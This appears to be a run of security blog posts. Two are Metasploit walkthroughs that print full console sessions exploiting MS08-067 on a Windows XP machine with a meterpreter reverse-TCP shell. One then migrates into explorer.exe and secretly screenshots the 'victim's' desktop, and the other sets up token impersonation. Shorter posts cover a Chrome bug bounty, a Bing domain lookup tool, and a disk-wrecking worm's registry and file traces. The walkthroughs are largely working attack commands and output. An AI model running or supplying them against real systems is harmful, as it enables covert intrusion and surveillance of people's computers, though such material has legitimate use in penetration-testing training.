Taking Screenshots Of The Victim’s Computer With Metasploit

Here’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module.  Start with a basic exploit to gain a meterpreter session.  You’ll need to make sure you migrate to a process that has access to Active Desktop or else you will get nothing but blank images:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1100)

meterpreter > ps

Process list
============

PID   Name   Arch   User   Path
—   —-   —-   —-   —-
0   [System Process]
4   System   x86   NT AUTHORITY\SYSTEM
384   smss.exe   x86   NT AUTHORITY\SYSTEM   \SystemRoot\System32\smss.exe
524   csrss.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\csrss.exe
556   winlogon.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\winlogon.exe
692   services.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\services.exe
704   lsass.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\lsass.exe
876   VBoxService.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\VBoxService.exe
904   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\svchost.exe
972   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1064   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\System32\svchost.exe
1124   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1192   svchost.exe   x86   NT AUTHORITY\LOCAL SERVICE   C:\WINDOWS\system32\svchost.exe
1452   spoolsv.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\spoolsv.exe
284   explorer.exe   x86   VM-WINXP\Troy   C:\WINDOWS\Explorer.EXE
624   VBoxTray.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\VBoxTray.exe
632   ctfmon.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\ctfmon.exe
656   alg.exe   x86 NT   AUTHORITY\LOCAL SERVICE   C:\WINDOWS\System32\alg.exe
1252   wscntfy.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\wscntfy.exe
1940   firefox.exe   x86   VM-WINXP\Troy   C:\Program Files\Mozilla Firefox\firefox.exe

meterpreter > migrate 284
[*] Migrating to 284…
[*] Migration completed successfully.
meterpreter >

Now we load the espia module and view the victim’s live desktop:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]

meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >

The image should open automatically and display on your screen:

That’s it.  You are now viewing the victim’s desktop without them even knowing you are there.

Posted in Internet, Networking, Privacy, Security | No Comments

Using Metasploit’s Incognito To Impersonate User Tokens

I just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system.  You can think of tokens as a web “cookie” which is just an object that holds your security information for the entire login process so that you don’t have to re-authenticate yourself on the system or network each time you want to access another object.  You can read more about tokens here: http://en.wikipedia.org/wiki/Token_(Windows_NT_architecture)

On this particular machine, “Troy” is an Admin account.

(without all the screenshots – sorry dial-up users)

We’ll start off by launching Metasploit and exploiting the system.  For this we need to make sure the payload returns a meterpreter session back to us:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:
Name     Current Setting  Required  Description
—-     —————  ——–  ———–
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
—-      —————  ——–  ———–
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:
Id  Name
–  —-
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1089)

meterpreter >

Posted in Internet, Networking, Privacy, Security, Windows | No Comments

Your Google Chrome Bugs Could Be Worth $500-$1337

Google has recently launched an “experimental new incentive” that could reward security researchers for their bugs in the Chrome browser (all versions – stable, beta, and dev) or in the open source Chromium project itself.  Their base reward is identical to Mozilla’s at $500, but they are offering a higher reward of $1337 for “particularly severe or particularly clever” bugs/vulnerabilities.

I personally like this and I hope a lot of researchers step up and claim the rewards.  The more bugs that get reported responsibly, the more secure the users of the Chrome browser will be.  Coupled with the major built-in security features already in place, this could very well put Chrome on top of the browser market.

Source:
http://blog.chromium.org/2010/01/encouraging-more-chromium-security.html

Posted in Internet, Security, Software | No Comments

Bing Web Server Probe

This is a tool for security researchers. It allows you to search for either an IP address or a DNS name and display all associated domain names known to Bing.

Download:
http://bingprobe.codeplex.com/

Posted in Internet, Networking, Privacy, Software | No Comments

Newest “IQ Test” Is Pure Evil

Named Win32.Worm.Zimuse.A, this new nasty claims to be an IQ Test but is really a worm that will create about 7-11 copies of itself and store them in critical areas of your Windows system and then destroy the first 50KB of the Master Boot Record (MBR) after X number of days (it’s being reported that variant A is 40 days, and variant B is 20 days).

The worm sets itself into the registry at:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]“Dump”=”%programfiles%\Dump\Dump.exe”

It also creates the following 2 “driver” files:

%system%\drivers\Mstart.sys
%system%\drivers\Mseu.sys

Source:
http://www.malwarecity.com/blog/malware-alert-win32wormzimusea-the-hard-disk-wrecker-736.html

Posted in Internet, Security, Windows | No Comments